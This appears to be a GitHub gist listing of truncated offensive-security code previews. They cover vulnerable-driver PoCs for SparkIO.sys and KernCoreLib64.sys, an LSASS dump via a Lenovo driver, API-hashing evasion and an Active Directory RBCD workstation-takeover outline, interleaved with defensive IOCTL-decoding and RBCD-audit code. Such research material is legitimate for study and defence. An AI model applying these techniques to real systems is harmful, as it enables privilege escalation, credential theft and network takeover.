
@alfarom256
alfarom256 / Source.cpp
Last active May 4, 2024 18:05
Thread Execution via NtCreateWorkerFactory
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // LARGE_INTEGER
alfarom256 / lel.cpp
Last active June 1, 2023 17:49
dump lsass but in a weird way you probably shouldn't do in prod with a vulnerable driver
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#include <DbgHelp.h>
#include "LenovoMemoryMgr.h"
#pragma comment(lib, "dbghelp")
typedef NTSTATUS(WINAPI* pNtQueryVirtualMemory)(HANDLE, PVOID, DWORD, PVOID, SIZE_T, PSIZE_T);
alfarom256 / source.cpp
Last active October 7, 2022 17:37
Uniwill SparkIO.sys PoC
/*
IOCTL 0x40002004 : Arbitrary Physical Memory Read using MmMapIoSpace
IOCTL 0x40002008 : Close a handle of your choice! + Stack-based Buffer Overflow
IOCTL 0x40002000 : Arbitrary RW to IO ports
*/
#include <Windows.h>
#include <stdio.h>
#define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); }
#define IOCTL_TRIGGER_OVERFLOW 0x40002008
alfarom256 / Source.cpp
Last active October 7, 2022 17:38
MSI KernCoreLib64.sys PoC
#include <Windows.h>
#include <stdio.h>
#define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); }
#define IOCTL_TRIGGER_OVERFLOW 0x80102040
// Replicate one byte across all eight bytes of a QWORD, e.g. 0x41 -> 0x4141414141414141,
// so a controlled value can be recognised in a crash dump or register
DWORD64 genPattern(BYTE b) {
    DWORD64 retVal = b;
    retVal |= retVal << 8;
    retVal |= retVal << 16;
    retVal |= retVal << 32;
    return retVal;
}
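The control codes quoted in the SparkIO.sys and KernCoreLib64.sys previews above are opaque until they are split into the fields that the Windows CTL_CODE macro packs together. The decoder below is an added example, not code from either gist: it applies the CTL_CODE bit layout in portable C so it builds off-Windows, and feeds it the four codes from this page. The METHOD_ and FILE_ access names follow the Windows definitions; the vendor-range boundaries (device type 0x8000, function 0x800) are the documented third-party ranges.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example: split a Windows I/O control code into the fields that
 * CTL_CODE(DeviceType, Function, Method, Access) packs together:
 *   bits 31..16  device type  (0x8000 and above is the vendor-defined range)
 *   bits 15..14  required access (0 FILE_ANY_ACCESS, 1 READ, 2 WRITE, 3 READ|WRITE)
 *   bits 13..2   function number (0x800 and above is the vendor-defined range)
 *   bits  1..0   transfer method (0 BUFFERED, 1 IN_DIRECT, 2 OUT_DIRECT, 3 NEITHER)
 * No driver is touched; this only interprets the numbers.
 */
struct ioctl_fields {
    uint32_t device_type;
    uint32_t access;
    uint32_t function;
    uint32_t method;
};

struct ioctl_fields ioctl_decode(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Inverse of ioctl_decode: the same packing the CTL_CODE macro performs. */
uint32_t ioctl_encode(uint32_t device_type, uint32_t function, uint32_t method, uint32_t access)
{
    return ((device_type & 0xFFFFu) << 16) | ((access & 0x3u) << 14) |
           ((function & 0xFFFu) << 2) | (method & 0x3u);
}

const char *ioctl_method_name(uint32_t method)
{
    static const char *names[] = {
        "METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"
    };
    return names[method & 0x3u];
}

const char *ioctl_access_name(uint32_t access)
{
    static const char *names[] = {
        "FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
        "FILE_READ_ACCESS|FILE_WRITE_ACCESS"
    };
    return names[access & 0x3u];
}

/* Function numbers below 0x800 are reserved for Microsoft; third-party
 * drivers are expected to allocate from 0x800 upwards. */
int ioctl_is_vendor_function(uint32_t code)
{
    return ioctl_decode(code).function >= 0x800u;
}

int main(void)
{
    /* The codes quoted in the two PoC previews on this page. */
    const uint32_t codes[] = { 0x40002000u, 0x40002004u, 0x40002008u, 0x80102040u };
    for (size_t i = 0; i < sizeof codes / sizeof codes[0]; i++) {
        struct ioctl_fields f = ioctl_decode(codes[i]);
        printf("0x%08x: device 0x%04x function 0x%03x %s %s%s\n",
               codes[i], f.device_type, f.function,
               ioctl_method_name(f.method), ioctl_access_name(f.access),
               ioctl_is_vendor_function(codes[i]) ? "" : " (reserved function range)");
    }
    return 0;
}
```

All four codes decode to METHOD_BUFFERED with FILE_ANY_ACCESS. METHOD_BUFFERED means the I/O manager copies the caller's input into a kernel buffer (Irp->AssociatedIrp.SystemBuffer) and hands the driver the caller-supplied length, which is exactly the shape in which an unchecked copy into a stack buffer becomes the overflow the SparkIO.sys preview describes; FILE_ANY_ACCESS means any handle to the device object can send the request, so reachability from a low-privileged user is decided solely by the DACL on the device object.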
alfarom256 / peb_ldr.h
Last active October 7, 2022 17:38
*Improved* header-only hash-based function resolution pt 3: LdrpHashTable
#pragma once
#include <Windows.h>
#include <winnt.h>
#include <winternl.h>
static BYTE prelude1[7]{
0x4D, 0x8d, 0x4b, 0xf0, // lea r9, [r11-10h]
0x45, 0x33, 0xc0 // xor r8d, r8d
};
alfarom256 / Workstation-Takeover.md
Created July 25, 2021 20:04 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
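Two things a defender can check against the chain above, as an added example that is not part of the forked gist: whether the WebClient service on a host is running or set to start, and which computer objects already carry a resource-based constrained delegation entry (msDS-AllowedToActOnBehalfOfOtherIdentity), since that attribute is what the relayed LDAPS write sets. The script assumes the RSAT ActiveDirectory module is installed and the caller can read computer objects; the property name and the ActiveDirectorySecurity decoding are standard, nothing else is assumed.

```powershell
# Added defender-side check (not code from the gist). Requires the RSAT
# ActiveDirectory module and read access to computer objects.
Import-Module ActiveDirectory

# 1. WebClient on the local host: the chain needs it running, and it is
#    manual/trigger-start by default, so "Stopped" alone is not a guarantee.
$svc = Get-Service -Name WebClient -ErrorAction SilentlyContinue
if ($svc) {
    'WebClient status: {0}, start type: {1}' -f $svc.Status, $svc.StartType
} else {
    'WebClient service not present on this host'
}

# 2. Computer objects that already have RBCD configured. The attribute is a
#    security descriptor; each ACE's trustee is a principal allowed to act
#    on behalf of other identities against that computer.
Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
    -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity' |
ForEach-Object {
    $raw = $_.'msDS-AllowedToActOnBehalfOfOtherIdentity'
    if ($raw -is [byte[]]) {
        # Raw binary form: decode it into an ActiveDirectorySecurity object.
        $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $sd.SetSecurityDescriptorBinaryForm($raw)
    } else {
        # The AD module may already return it decoded.
        $sd = $raw
    }
    foreach ($ace in $sd.Access) {
        [pscustomobject]@{
            Computer  = $_.Name
            TrustedBy = $ace.IdentityReference.Value
            Rights    = $ace.ActiveDirectoryRights
            Type      = $ace.AccessControlType
        }
    }
}
```

Any trustee in the second listing that is not a deliberately configured front-end service (in particular a freshly created machine account) is worth treating as an indicator of the relay-to-RBCD step; the attribute can be cleared on a computer object with `Set-ADComputer -Identity <name> -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity'` once the entry has been reviewed.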
